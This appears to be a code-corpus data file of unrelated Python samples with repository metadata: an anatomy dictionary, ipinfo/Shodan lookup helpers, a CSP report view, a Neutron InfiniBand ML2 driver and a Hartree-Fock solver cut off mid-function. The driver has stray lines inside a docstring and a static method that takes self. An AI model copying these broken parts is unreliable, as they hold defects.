"Ascending colon": {},
"Transverse colon": {},
"Descending colon": {},
"Sigmoid colon": {},
},
"Rectum": {},
"Liver": {},
"Gallbladder": {},
"Mesentery": {},
"Pancreas": {},
"Anal canal": {},
},
"Respiratory system": {
"Nasal cavity": {},
"Pharynx": {},
"Larynx": {},
"Trachea": {},
"Bronchi": {},
"Bronchioles": {},
"Lungs": {},
"Muscles of breathing": {},
},
"Urinary system": {"Kidneys": {}, "Ureter": {}, "Bladder": {}, "Urethra": {}},
"Female reproductive system": {
"Internal reproductive organs": {
"Ovaries": {},
"Fallopian tubes": {},
"Uterus": {},
"Cervix": {},
"Vagina": {},
},
"External reproductive organs": {"Vulva": {}, "Clitoris": {}},
"Placenta": {},
},
"Male reproductive system": {
"Internal reproductive organs": {
"Testes": {},
"Epididymis": {},
"Vas deferens": {},
"Seminal vesicles": {},
"Prostate": {},
"Bulbourethral glands": {},
},
"External reproductive organs": {"Penis": {}, "Scrotum": {}},
},
"Endocrine system": {
"Pituitary gland": {},
"Pineal gland": {},
"Thyroid gland": {},
"Parathyroid glands": {},
"Adrenal glands": {},
"Pancreas": {},
},
"Circulatory system": {"Heart": {}, "Arteries": {}, "Veins": {}, "Capillaries": {}},
"Lymphatic system": {
"Lymphatic vessel": {},
"Lymph node": {},
"Bone marrow": {},
"Thymus": {},
"Spleen": {},
"Gut-associated lymphoid tissue": {"Tonsils": {}},
"Interstitium": {},
},
"Nervous system": {
"Brain": {"Cerebrum": {"Cerebral hemispheres": {}}, "Diencephalon": {}},
"brainstem": {"Midbrain": {}, "Pons": {}, "Medulla oblongata": {}},
"Cerebellum": {},
"spinal cord": {},
"ventricular system": {"Choroid plexus": {}},
},
"Peripheral nervous system": {
"Nerves": {
"Cranial nerves": {},
"Spinal nerves": {},
"Ganglia": {},
"Enteric nervous system": {},
}
},
"Sensory organs": {
"Eye": {"Cornea": {}, "Iris": {}, "Ciliary body": {}, "Lens": {}, "Retina": {}},
"Ear": {
"Outer ear": {"Earlobe": {}},
"Eardrum": {},
"Middle ear": {"Ossicles": {}},
"Inner ear": {
"Cochlea": {},
"Vestibule of the ear": {},
"Semicircular canals": {},
},
},
"Olfactory epithelium": {},
"Tongue": {"Taste buds": {}},
},
"Integumentary system": {
"Mammary glands": {},
"Skin": {},
"Subcutaneous tissue": {},
},
}
| 1.773438
| 2
|
app/utils.py
|
MilyMilo/hoodie
| 3
|
12780121
|
<filename>app/utils.py
import ipinfo as ipinfo_lib
import shodan as shodan_lib
from django.conf import settings
ipinfo = ipinfo_lib.getHandler(settings.IPINFO_TOKEN)
shodan = shodan_lib.Shodan(settings.SHODAN_TOKEN)
def get_ip_data(ip_address):
data = ipinfo.getDetails(ip_address)
return data.all
def get_shodan_data(ip_address):
try:
data = shodan.host(ip_address)
return _extract_shodan_data(data)
except:
return {}
def _extract_shodan_data(d):
extracted = {
"last_update": d["last_update"],
"vulns": d["vulns"],
"domains": d["domains"],
"ports": sorted(d["ports"]),
"os": d["os"],
"services": [],
}
for s in d["data"]:
se = {
"module": s["_shodan"]["module"],
"product": s.get("product", None),
"port": s["port"],
"transport": s["transport"],
}
if "http" in s:
se["http"] = {
"host": s["http"]["host"],
"location": s["http"]["location"],
"server": s["http"]["server"],
"title": s["http"]["title"],
"robots": s["http"]["robots"],
"components": s["http"]["components"]
}
if "dns" in s:
se["dns"] = {
"resolver_hostname": s["dns"]["resolver_hostname"],
"recursive": s["dns"]["recursive"],
"software": s["dns"]["software"],
}
if "ftp" in s:
se["ftp"] = {
"anonymous": s["ftp"]["anonymous"]
}
extracted["services"].append(se)
return extracted
| 2.171875
| 2
|
src/pretix/base/views/csp.py
|
pajowu/pretix
| 1
|
12780122
|
import json
import logging
from django.http import HttpResponse, HttpResponseBadRequest
from django.views.decorators.csrf import csrf_exempt
logger = logging.getLogger('pretix.security.csp')
@csrf_exempt
def csp_report(request):
try:
body = json.loads(request.body.decode())
logger.warning(
'CSP violation at {r[document-uri]}\n'
'Referer: {r[referrer]}\n'
'Blocked: {r[blocked-uri]}\n'
'Violated: {r[violated-directive]}\n'
'Original polity: {r[original-policy]}'.format(r=body['csp-report'])
)
except (ValueError, KeyError) as e:
logger.exception('CSP report failed ' + str(e))
return HttpResponseBadRequest()
return HttpResponse()
| 2.203125
| 2
|
upper method.py
|
aash-gates/aash-python-babysteps
| 7
|
12780123
|
<reponame>aash-gates/aash-python-babysteps
#coverting the string to upper case IBM Digital Nation
string = "Aashik Socially known as aash Gates"
print(string)
import time
time.sleep(0.33)
print("converting the string to upper case")
import time
time.sleep(1.00)
new_string = string.upper()
print(new_string)
#end of the Program
| 3.6875
| 4
|
ctf/migrations/0003_auto_20171220_1132.py
|
scnerd/pythonathon_v3
| 0
|
12780124
|
# Generated by Django 2.0 on 2017-12-20 16:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ctf', '0002_auto_20171220_1128'),
]
operations = [
migrations.AlterField(
model_name='category',
name='requires',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='categories_required_by', to='ctf.Question'),
),
migrations.AlterField(
model_name='question',
name='category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='questions', to='ctf.Category'),
),
migrations.AlterField(
model_name='question',
name='hint',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='question',
name='requires',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='questions_required_by', to='ctf.Question'),
),
]
| 1.6875
| 2
|
networking_mlnx_baremetal/plugins/ml2/mech_ib_baremetal.py
|
IamFive/networking-mlnx-baremetal
| 0
|
12780125
|
# Copyright 2020 HuaWei Technologies. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from ironicclient.common.apiclient import exceptions as ironic_exc
from neutron.db import provisioning_blocks
from neutron_lib import constants as n_const
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib.plugins.ml2 import api
from oslo_config import cfg
from oslo_log import log as logging
from networking_mlnx_baremetal import constants as const, exceptions
from networking_mlnx_baremetal import ironic_client
from networking_mlnx_baremetal import ufm_client
from networking_mlnx_baremetal._i18n import _
from networking_mlnx_baremetal.plugins.ml2 import config
from networking_mlnx_baremetal.ufmclient import exceptions as ufm_exec
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
config.register_opts(CONF)
MLNX_IB_BAREMETAL_ENTITY = 'MLNX-IB-Baremetal'
class InfiniBandBaremetalMechanismDriver(api.MechanismDriver):
"""OpenStack neutron ml2 mechanism driver for mellanox infini-band PKey
configuration when provisioning baremetal using Ironic.
"""
def initialize(self):
"""Perform driver initialization.
Called after all drivers have been loaded and the database has
been initialized. No abstract methods defined below will be
called prior to this method being called.
"""
self.ironic_client = ironic_client.get_client()
self.ufm_client = ufm_client.get_client()
self.conf = CONF[const.MLNX_BAREMETAL_DRIVER_GROUP_NAME]
self.allowed_network_types = const.SUPPORTED_NETWORK_TYPES
self.allowed_physical_networks = self.conf.physical_networks
def create_network_precommit(self, context):
"""Allocate resources for a new network.
:param context: NetworkContext instance describing the new
network.
Create a new network, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_network_postcommit(self, context):
"""Create a network.
:param context: NetworkContext instance describing the new
network.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
"""
pass
def update_network_precommit(self, context):
"""Update resources of a network.
:param context: NetworkContext instance describing the new
state of the network, as well as the original state prior
to the update_network call.
Update values of a network, updating the associated resources
in the database. Called inside transaction context on session.
Raising an exception will result in rollback of the
transaction.
update_network_precommit is called for all changes to the
network state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def update_network_postcommit(self, context):
"""Update a network.
:param context: NetworkContext instance describing the new
state of the network, as well as the original state prior
to the update_network call.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
update_network_postcommit is called for all changes to the
network state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def delete_network_precommit(self, context):
"""Delete resources for a network.
:param context: NetworkContext instance describing the current
state of the network, prior to the call to delete it.
Delete network resources previously allocated by this
mechanism driver for a network. Called inside transaction
context on session. Runtime errors are not expected, but
raising an exception will result in rollback of the
transaction.
"""
pass
def delete_network_postcommit(self, context):
"""Delete a network.
:param context: NetworkContext instance describing the current
state of the network, prior to the call to delete it.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
# TODO(qianbiao.ng): if an UFM partition has no guid, it will be auto
# deleted. So, if port unbound logic is stable (remove guid when
# unbound), we may ignore delete_network_postcommit callback?
for segment in context.network_segments:
if self._is_segment_supported(segment):
segmentation_id = segment.get(api.SEGMENTATION_ID)
pkey = hex(segmentation_id)
try:
self.ufm_client.pkey.delete(pkey)
except ufm_exec.ResourceNotFoundError:
# NOTE(turnbig): ignore 404 exception, because of that the
# UFM partition key may have not been setup at this point.
LOG.info(_("UFM partition key %(pkey)s does not exists, "
"could not be deleted."),
{'pkey': pkey})
except ufm_exec.UfmClientError as e:
LOG.error(_("Failed to delete UFM partition key %(pkey)s, "
"reason is %(reason)s."),
{'pkey': pkey, 'reason': e})
raise
def create_subnet_precommit(self, context):
"""Allocate resources for a new subnet.
:param context: SubnetContext instance describing the new
subnet.
rt = context.current
device_id = port['device_id']
device_owner = port['device_owner']
Create a new subnet, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_subnet_postcommit(self, context):
"""Create a subnet.
:param context: SubnetContext instance describing the new
subnet.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
"""
pass
def update_subnet_precommit(self, context):
"""Update resources of a subnet.
:param context: SubnetContext instance describing the new
state of the subnet, as well as the original state prior
to the update_subnet call.
Update values of a subnet, updating the associated resources
in the database. Called inside transaction context on session.
Raising an exception will result in rollback of the
transaction.
update_subnet_precommit is called for all changes to the
subnet state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def update_subnet_postcommit(self, context):
"""Update a subnet.
:param context: SubnetContext instance describing the new
state of the subnet, as well as the original state prior
to the update_subnet call.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
update_subnet_postcommit is called for all changes to the
subnet state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def delete_subnet_precommit(self, context):
"""Delete resources for a subnet.
:param context: SubnetContext instance describing the current
state of the subnet, prior to the call to delete it.
Delete subnet resources previously allocated by this
mechanism driver for a subnet. Called inside transaction
context on session. Runtime errors are not expected, but
raising an exception will result in rollback of the
transaction.
"""
pass
def delete_subnet_postcommit(self, context):
"""Delete a subnet.
:param context: SubnetContext instance describing the current
state of the subnet, prior to the call to delete it.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
pass
def create_port_precommit(self, context):
"""Allocate resources for a new port.
:param context: PortContext instance describing the port.
Create a new port, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_port_postcommit(self, context):
"""Create a port.
:param context: PortContext instance describing the port.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
result in the deletion of the resource.
"""
pass
def update_port_precommit(self, context):
"""Update resources of a port.
:param context: PortContext instance describing the new
state of the port, as well as the original state prior
to the update_port call.
Called inside transaction context on session to complete a
port update as defined by this mechanism driver. Raising an
exception will result in rollback of the transaction.
update_port_precommit is called for all changes to the port
state. It is up to the mechanism driver to ignore state or
state changes that it does not know or care about.
"""
pass
def update_port_postcommit(self, context):
# type: (api.PortContext) -> None
"""Update a port.
:param context: PortContext instance describing the new
state of the port, as well as the original state prior
to the update_port call.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
result in the deletion of the resource.
update_port_postcommit is called for all changes to the port
state. It is up to the mechanism driver to ignore state or
state changes that it does not know or care about.
"""
port = context.current
original_port = context.original
if not self._is_baremetal_port(port):
LOG.info(_('Port is not a baremetal port, '
'skip update_port_postcommit callback.'))
return
if not self._is_port_bound(context):
LOG.info(_('Port is not bound by current driver, '
'skip update_port_postcommit callback.'))
return
binding_level = self._get_binding_level(context)
LOG.info(_('Port is bound by current driver with binding '
'level %(binding_level)s.'),
{'binding_level': binding_level})
current_vif_type = context.vif_type
original_vif_type = context.original_vif_type
# when port is unbound, unbind relevant guids from IB partition.
if (current_vif_type == portbindings.VIF_TYPE_UNBOUND
and original_vif_type not in const.UNBOUND_VIF_TYPES):
LOG.info(_("Port's VIF type changed from bound to unbound"))
LOG.info(_("Remove infiniband guids from partition key now."))
# binding:host_id has been clear in current port
node_uuid = original_port.get(portbindings.HOST_ID)
node_ib_guids = self._get_ironic_ib_guids(node_uuid)
if len(node_ib_guids) == 0:
LOG.error(_(
'For current port(%(port)s), could not find any '
'infiniband port presents in the same ironic '
'node(%(node_uuid)s), could not remove guids from '
'partition key.'),
{port: port, 'node_uuid': node_uuid})
return
LOG.info(_('To be removed infiniband port guids: %s.')
% node_ib_guids)
segmentation_id = binding_level.get(api.SEGMENTATION_ID)
self.ufm_client.pkey.remove_guids(hex(segmentation_id),
node_ib_guids)
LOG.info(_('Infiniband port guids %(guids)s has been removed '
'from partition key %(pkey)s.'),
{'guids': node_ib_guids,
'pkey': hex(segmentation_id)})
# when port is bound, mark port as provision completed.
if (current_vif_type not in const.UNBOUND_VIF_TYPES
and original_vif_type in const.UNBOUND_VIF_TYPES):
LOG.info(_("Port's VIF type changed from unbound to bound."))
# NOTE(qianbiao.ng): this provisioning_complete action maps to
# provisioning_blocks.add_provisioning_component called in
# bind_port process.
# provisioning_blocks.provisioning_complete(
# context._plugin_context, port['id'], resources.PORT,
# MLNX_IB_BAREMETAL_ENTITY)
pass
# when port binding fails, raise exception
if (port.get('status') == n_const.PORT_STATUS_ERROR
and current_vif_type == portbindings.VIF_TYPE_BINDING_FAILED):
LOG.info(_("Port binding failed, Port's VIF details: "
"%(vif_details)s."),
{'vif_details': context.vif_details})
if context.vif_details.get('driver') == const.DRIVE_NAME:
LOG.info(_("Port binding failure is caused by current driver. "
"Raise an exception to abort port update "
"process."))
raise exceptions.PortBindingException(**context.vif_details)
def delete_port_precommit(self, context):
"""Delete resources of a port.
:param context: PortContext instance describing the current
state of the port, prior to the call to delete it.
Called inside transaction context on session. Runtime errors
are not expected, but raising an exception will result in
rollback of the transaction.
"""
pass
def delete_port_postcommit(self, context):
"""Delete a port.
:param context: PortContext instance describing the current
state of the port, prior to the call to delete it.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
# NOTE(turnbig): it's impossible to get relevant infiniband ports
# here, the relevant Ironic Node(binding:host_id) has been clear
# before deleted.
pass
def bind_port(self, context):
"""Attempt to bind a port.
:param context: PortContext instance describing the port
This method is called outside any transaction to attempt to
establish a port binding using this mechanism driver. Bindings
may be created at each of multiple levels of a hierarchical
network, and are established from the top level downward. At
each level, the mechanism driver determines whether it can
bind to any of the network segments in the
context.segments_to_bind property, based on the value of the
context.host property, any relevant port or network
attributes, and its own knowledge of the network topology. At
the top level, context.segments_to_bind contains the static
segments of the port's network. At each lower level of
binding, it contains static or dynamic segments supplied by
the driver that bound at the level above. If the driver is
able to complete the binding of the port to any segment in
context.segments_to_bind, it must call context.set_binding
with the binding details. If it can partially bind the port,
it must call context.continue_binding with the network
segments to be used to bind at the next lower level.
If the binding results are committed after bind_port returns,
they will be seen by all mechanism drivers as
update_port_precommit and update_port_postcommit calls. But if
some other thread or process concurrently binds or updates the
port, these binding results will not be committed, and
update_port_precommit and update_port_postcommit will not be
called on the mechanism drivers with these results. Because
binding results can be discarded rather than committed,
drivers should avoid making persistent state changes in
bind_port, or else must ensure that such state changes are
eventually cleaned up.
Implementing this method explicitly declares the mechanism
driver as having the intention to bind ports. This is inspected
by the QoS service to identify the available QoS rules you
can use with ports.
"""
port = context.current
is_baremetal_port = self._is_baremetal_port(port)
if not is_baremetal_port:
LOG.info(_('Port is not a baremetal port, skip binding.'))
return
# NOTE(turnbig): it seems ml2 driver will auto check whether a
# driver has been bound by a driver through binding_levels
# has_port_bound = self._is_port_bound(port)
# if has_port_bound:
# LOG.info(_('Port has been bound by this driver, skip binding.'))
# return
# try to bind segment now
LOG.info(_('Port is supported, will try binding IB partition now.'))
for segment in context.segments_to_bind:
if self._is_segment_supported(segment):
node_uuid = port.get(portbindings.HOST_ID)
node_ib_guids = self._get_ironic_ib_guids(node_uuid)
if len(node_ib_guids) == 0:
LOG.warning(_(
'For current port(%(port)s), could not find any IB '
'port presents in the same ironic '
'node(%(node_uuid)s), break bind port process now.'),
{port: port, 'node_uuid': node_uuid})
return
LOG.info(_('Load infiniband ports guids: %s.')
% node_ib_guids)
LOG.debug(_('Try to bind IB ports using segment: %s'), segment)
# update partition key for relevant guids
segment_id = segment[api.ID]
segmentation_id = segment[api.SEGMENTATION_ID]
try:
provisioning_blocks.add_provisioning_component(
context._plugin_context, port['id'], resources.PORT,
MLNX_IB_BAREMETAL_ENTITY)
self.ufm_client.pkey.add_guids(hex(segmentation_id),
guids=node_ib_guids)
LOG.info(_('Successfully bound IB ports %(ports)s to '
'partition %(pkey)s.'),
{'ports': node_ib_guids,
'pkey': hex(segmentation_id)})
# NOTE(turnbig): setting VIF details has no effect here.
# details = {
# const.MLNX_EXTRA_NS: {
# 'guids': node_ib_guids,
# 'pkey': segmentation_id,
# }
# }
# LOG.info(_('Update bound IB port vif info: '
# '%(vif_details)s.'),
# {'vif_details': details})
# context._binding.vif_details = jsonutils.dumps(details)
# NOTE(turnbig): chain current segment again to next driver
new_segment = copy.deepcopy(segment)
context.continue_binding(segment_id, [new_segment])
return
except ufm_exec.UfmClientError as e:
LOG.error(_("Failed to add guids %(guids)s to UFM "
"partition key %(pkey)s, "
"reason is %(reason)s."),
{'guids': node_ib_guids,
'pkey': hex(segmentation_id),
'reason': str(e)})
# TODO(qianbiao.ng): if IB partition binding fails,
# we should abort the bind_port process and exit.
vif_details = {'guids': node_ib_guids,
'pkey': hex(segmentation_id),
'driver': const.DRIVE_NAME,
'reason': str(e)}
context.set_binding(segment[api.ID],
portbindings.VIF_TYPE_BINDING_FAILED,
vif_details,
status=n_const.PORT_STATUS_ERROR)
@staticmethod
def _is_baremetal_port(port):
"""Return whether a port's VNIC_TYPE is baremetal.
Ports supported by this driver must have VNIC type 'baremetal'.
:param port: The port to check
:returns: true if the port's VNIC_TYPE is baremetal
"""
vnic_type = port[portbindings.VNIC_TYPE]
return vnic_type == portbindings.VNIC_BAREMETAL
@staticmethod
def _is_network_supported(self, network):
"""Return whether a network is supported by this driver.
:param network: The network(
:class: openstack.network.v2.network.Network) instance to check
:returns: true if network is supported else false
"""
_this = InfiniBandBaremetalMechanismDriver
LOG.debug("Checking whether network is supported: %(network)s.",
{'network': network})
network_id = network.get('id')
network_type = network.get('provider_network_type')
segmentation_id = network.get('provider_segmentation_id')
physical_network = network.get('provider_physical_network')
if network_type not in self.allowed_network_types:
LOG.debug(_(
'Network %(network_id)s with segmentation-id '
'%(segmentation_id)s has network type %(network_type)s '
'but mlnx_ib_bm mechanism driver only '
'support %(allowed_network_types)s.'),
{'network_id': network_id,
'segmentation_id': segmentation_id,
'network_type': network_type,
'allowed_network_types': self.allowed_network_types})
return False
if not segmentation_id:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s does not has a '
'segmentation id, mlnx_ib_bm requires a segmentation id to '
'create UFM partition.'),
{'network_id': network_id, 'id': segmentation_id})
return False
if not self._is_physical_network_matches(physical_network):
LOG.debug(_(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but mlnx_ib_bm mechanism '
'driver was pre-configured to watch on physical networks '
'%(allowed_physical_networks)s.'),
{'network_id': network_id,
'id': segmentation_id,
'physnet': physical_network,
'allowed_physical_networks': self.allowed_physical_networks})
return False
return True
def _is_segment_supported(self, segment):
"""Return whether a network segment is supported by this driver. A
segment dictionary looks like:
{
"network_id": "9425b757-339d-4954-a17b-dbb3f7061006",
"segmentation_id": 15998,
"physical_network": null,
"id": "3a0946cc-1f61-4211-8a33-b8e2b0b7a2a0",
"network_type": "vxlan"
},
Segment supported by this driver must:
- have network type 'vxlan' or 'vlan'.
- have physical networks in pre-configured physical-networks
- have a segmentation_id
:param segment: indicates the segment to check
:returns: true if segment is supported else false
"""
LOG.debug("Checking whether segment is supported: %(segment)s ",
{'segment': segment})
segment_id = segment[api.ID]
network_id = segment[api.NETWORK_ID]
network_type = segment[api.NETWORK_TYPE]
segmentation_id = segment[api.SEGMENTATION_ID]
physical_network = segment[api.PHYSICAL_NETWORK]
if network_type not in self.allowed_network_types:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s has '
'network type %(network_type)s but mlnx_ib_bm mechanism '
'driver only support %(allowed_network_types)s.'),
{'network_id': network_id,
'id': segment_id,
'network_type': network_type,
'allowed_network_types': self.allowed_network_types})
return False
if not segmentation_id:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s does not has a '
'segmentation id, mlnx_ib_bm requires a segmentation id to '
'create UFM partition.'),
{'network_id': network_id, 'id': segment_id})
return False
if not self._is_physical_network_matches(physical_network):
LOG.debug(_(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but mlnx_ib_bm mechanism '
'driver was pre-configured to watch on physical networks '
'%(allowed_physical_networks)s.'),
{'network_id': network_id,
'id': segment_id,
'physnet': physical_network,
'allowed_physical_networks': self.allowed_physical_networks})
return False
return True
def _is_physical_network_matches(self, physical_network):
"""Return whether the physical network matches the pre-configured
physical-networks of this driver. pre-configured physical-network '*'
means matches anything include none.
:param physical_network: the physical network to check
:return: true if match else false
"""
if (const.PHYSICAL_NETWORK_ANY in self.allowed_physical_networks
or physical_network in self.allowed_physical_networks):
return True
return False
@staticmethod
def _is_port_supported(port_context):
# type: (api.PortContext) -> bool
"""NOTE(turnbig): deprecated, Return whether a port binding is
supported by this driver
Ports supported by this driver must:
- have VNIC type 'baremetal'.
- have physical networks in pre-configured physical-networks
- have
- others maybe? (like Huawei-ml2-driver use prefix)
:param port_context: The port-context to check
:returns: true if supported else false
"""
# TODO(qianbiao.ng): add same strategy like huawei ml2 driver do later.
network = port_context.network.current
physical_network = network.provider_physical_network
this = InfiniBandBaremetalMechanismDriver
return (this._is_baremetal_port(port_context)
and this._is_network_type_supported(network)
and this._is_physical_network_matches(physical_network))
@staticmethod
def _is_port_bound(port_context):
# type: (api.PortContext) -> bool
"""Return whether a port has been bound by this driver.
Ports bound by this driver have their binding:levels contains a level
generated by this driver and the segment of that level is in the
network segments of this port.
NOTE(turnbig): this driver does not has a realistic neutron port
connected to an infiniband port, the port here is a baremetal PXE
ethernet port in the same Ironic node which owns the realistic
infiniband ports.
:param port_context: The PortContext to check
:returns: true if port has been bound by this driver else false
"""
this = InfiniBandBaremetalMechanismDriver
port_id = port_context.current.get('id')
binding_level = this._get_binding_level(port_context)
if binding_level:
segmentation_id = binding_level.get(api.SEGMENTATION_ID)
LOG.info("Port %(port_id)s has been bound to segmentation "
"%(segmentation_id)s by driver %(driver)s",
{"port_id": port_id,
"segmentation_id": segmentation_id,
"driver": const.DRIVE_NAME})
return True
LOG.info("Port %(port_id)s is not bound to any known segmentation "
"of its network by driver %(driver)s",
{"port_id": port_id,
"driver": const.DRIVE_NAME})
return False
@staticmethod
def _get_binding_level(port_context):
# type: (api.PortContext) -> dict
"""Return the binding level relevant to this driver.
Ports bound by this driver have their binding:levels contains a level
generated by this driver and the segment of that level is in the
network segments of this port.
NOTE(turnbig): this driver does not has a realistic neutron port
connected to an infiniband port, the port here is a baremetal PXE
ethernet port in the same Ironic node which owns the realistic
infiniband ports.
:param port_context: The PortContext to check
:returns: binding level if port has been bound by this driver else None
"""
network_segments = port_context.network.network_segments
network_segment_id_list = {s.get(api.SEGMENTATION_ID)
for s in network_segments}
# NOTE(qianbiao.ng): It's impossible to get binding_levels from
# PortContext.binding_levels in this place (only in bind_port
# callback). But, binding_levels is passed as a property in port
# dictionary. Remember this binding_levels property has different
# data structure from PortContext.binding_levels.
"""binding_levels property examples:
[
{
"physical_network": "",
"driver": "mlnx_ib_bm",
"network_type": "vxlan",
"segmentation_id": 15998,
"level": 0
},
....
]
"""
binding_levels = port_context.current.get('binding_levels', [])
LOG.info("Get binding_level of current driver from "
"network segments: %(segments)s, "
"binding levels: %(binding_levels)s.",
{'segments': network_segments,
'binding_levels': binding_levels})
for level in binding_levels:
bound_driver = level.get('driver')
segmentation_id = level.get(api.SEGMENTATION_ID)
if (bound_driver == const.DRIVE_NAME and
segmentation_id in network_segment_id_list):
return level
return None
def _get_ironic_ib_guids(self, node):
"""Get all ib guid list of an Ironic node.
:param node: indicates the uuid of ironic node
:return: infiniband guid list for all present IB ports
"""
try:
node_ports = self.ironic_client.port.list(node=node, detail=True)
node_ib_guids = [node_port.extra.get('client-id')
for node_port in node_ports
if node_port.extra.get('client-id')]
return node_ib_guids
except ironic_exc.UnsupportedVersion:
LOG.exception(
"Failed to get ironic port list, Ironic Client is "
"using unsupported version of the API.")
raise
except (ironic_exc.AuthPluginOptionsMissing,
ironic_exc.AuthSystemNotFound):
LOG.exception("Failed to get ironic port list due to Ironic Client"
" authentication failure.")
raise
except Exception:
LOG.exception("Failed to get ironic port list.")
raise
| 1.5
| 2
|
output/models/nist_data/list_pkg/unsigned_byte/schema_instance/nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd/__init__.py
|
tefra/xsdata-w3c-tests
| 1
|
12780126
|
<filename>output/models/nist_data/list_pkg/unsigned_byte/schema_instance/nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd/__init__.py
from output.models.nist_data.list_pkg.unsigned_byte.schema_instance.nistschema_sv_iv_list_unsigned_byte_enumeration_2_xsd.nistschema_sv_iv_list_unsigned_byte_enumeration_2 import (
NistschemaSvIvListUnsignedByteEnumeration2,
NistschemaSvIvListUnsignedByteEnumeration2Type,
)
__all__ = [
"NistschemaSvIvListUnsignedByteEnumeration2",
"NistschemaSvIvListUnsignedByteEnumeration2Type",
]
| 1.117188
| 1
|
src/lipkin/hf.py
|
kim-jane/NuclearManyBody
| 0
|
12780127
|
import numpy as np
from lipkin.model import LipkinModel
class HartreeFock(LipkinModel):
name = 'Hartree-Fock'
def __init__(self, epsilon, V, Omega):
if Omega%2 == 1:
raise ValueError('This HF implementation assumes N = Omega = even.')
LipkinModel.__init__(self, epsilon, V, Omega, Omega)
self.r_gs = (-1)**(0.5*self.Omega)
self.err = 1E-8
def solve_equations(self, num_iter=100, theta0=0.0, phi0=0.0):
# set initial tau
tau = np.array([theta0, phi0])
# construct HF hamiltonian
h = self.get_self_consistent_hamiltonian(tau)
# construct kinetic energy
T = np.zeros((2,2), dtype=np.complex128)
T[0,0] = -0.5*self.epsilon*self.Omega
T[1,1] = 0.5*self.epsilon*self.Omega
# container for single particle potential
Gamma = np.zeros((2,2), dtype=np.complex128)
for i in range(num_iter):
# solve eigenvalue problem
eigvals, eigvecs = np.linalg.eig(h)
# construct new density matrix
rho = np.outer(eigvecs[:,0], np.conjugate(eigvecs[:,0]))
# construct new potential
Gamma[0,1] = -self.V*self.Omega*(self.Omega-1)*rho[1,0]
Gamma[1,0] = -self.V*self.Omega*(self.Omega-1)*rho[0,1]
# construct new hamiltonian
h = T + Gamma
# calculate energy
E = 0.5*np.trace(np.dot(T+h, rho)).real
return E
def get_self_consistent_hamiltonian(self, tau):
theta, phi = tau[0], tau[1]
h = np.empty((2,2), dtype=np.complex128)
h[0,0] = 1
h[1,1] = -1
h[0,1] = self.chi*np.sin(theta)*np.exp(1j*phi)
h[1,0] = self.chi*np.sin(theta)*np.exp(-1j*phi)
return -0.5*self.epsilon*self.Omega*h
def minimize_energy(self, num_iter=10000):
# pick small initial tau = (theta, phi)
tau = np.random.normal(0.0, 0.1, 2)
# initialize adam optimizer
self.m = np.zeros(2)
self.v = np.zeros(2)
# start minimizing
for self.t in range(1, num_iter+1):
E = self.get_energy(tau)
grad = self.get_gradient_energy(tau)
tau = self.update_tau(tau, grad)
return tau
def minimize_signature_projected_energy(self, r, num_iter=10000):
# pick small initial tau = (theta, phi)
tau = np.random.normal(0.0, 0.1, 2)
# initialize adam optimizer
self.m = np.zeros(2)
self.v = np.zeros(2)
# start minimizing
for self.t in range(1, num_iter+1):
Er = self.get_signature_projected_energy(r, tau)
grad = self.get_gradient_projected_energy(r, tau)
tau = self.update_tau(tau, grad)
return tau
def get_energy(self, tau):
theta, phi = tau[0], tau[1]
E = np.cos(theta)+0.5*self.chi*(np.sin(theta)**2)*np.cos(2*phi);
return -0.5*self.epsilon*self.Omega*E
def get_gradient_energy(self, tau):
theta, phi = tau[0], tau[1]
factor = 0.5*self.epsilon*self.Omega*np.sin(theta)
